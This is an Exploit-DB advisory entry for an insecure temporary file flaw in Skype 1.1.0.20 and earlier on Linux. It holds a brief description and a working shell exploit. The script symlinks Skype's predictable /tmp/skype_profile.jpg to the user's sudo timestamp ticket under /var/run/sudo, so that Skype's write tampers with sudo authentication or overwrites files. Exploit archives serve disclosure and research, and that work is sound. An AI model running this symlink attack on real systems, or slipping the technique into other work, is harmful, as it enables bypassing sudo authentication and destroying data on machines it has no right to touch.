Skype Technologies Skype 0.92/1.0/1.1 Insecure Temporary File Creation Vulnerability

2005-07-18T00:00:00
ID EDB-ID:25993
Type exploitdb
Reporter Giovanni Delvecchio
Modified 2005-07-18T00:00:00

Description

Skype Technologies Skype 0.92/1.0/1.1 Insecure Temporary File Creation Vulnerability. Local exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/14293/info

Skype is affected by an insecure temporary file creation vulnerability.

Exploitation would most likely result in loss of data or a denial of service if critical files are overwritten in the attack. Other attacks may be possible as well.

Skype 1.1.0.20 and prior versions are affected. 

#!/bin/sh

#get current terminal number from /dev/pts/xx
terminal_number=`tty | cut -f4 -d '/'`

user_ticket=$USER/$terminal_number:root
ln -s /var/run/sudo/$user_ticket /tmp/skype_profile.jpg